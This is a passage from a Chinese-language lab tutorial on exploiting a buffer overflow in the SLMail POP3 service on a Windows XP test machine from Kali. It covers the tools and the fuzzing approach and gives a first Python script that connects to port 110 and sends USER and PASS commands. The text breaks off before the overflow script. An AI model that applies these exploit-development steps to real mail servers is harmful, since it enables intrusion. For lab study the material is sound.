该实验结合网络搜索,如有侵权,联系删除。
目录
实验前准备
工具:
其中软件的安装都按照默认安装即可,mona.py需要放到Immunity Debugger的安装目录中:\Immunity Inc\Immunity Debugger\PyCommands
平台:
- 攻击机:kali Linux IP:192.168.3.110
- 目标机:Windows XP IP:192.168.3.104
netstat -nao 查看端口
services.msc 查看pop3服务
进行模糊测试
nc IP 25/110端口。
对于未知协议的模糊测试,第一种方法是查看是否有RFC,有的话查看并在用户输入的部分进行测试;第二种是没有RFC指定的协议,可以通过Wireshark来抓包、查看该协议是如何进行指令传输的、命令格式时如何的。
01.py
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "\nSending evil buffer..."
s.connect(("192.168.3.104",110))
data = s.recv(1024) ###将110端口返回的数据显示在屏幕中
print data
s.send("USER "+"\r\n")
data = s.recv(1024)
print data
s.send("PASS test\r\n")
data = s.recv(1024)
print data
s.close()
print "\nDone"
except:
print "Could not connect to POP3!"
xp系统上打开immunity debugger,attach slmail,开始时左下角为pause,按F9或图中所示运行
进行溢出测试
02.py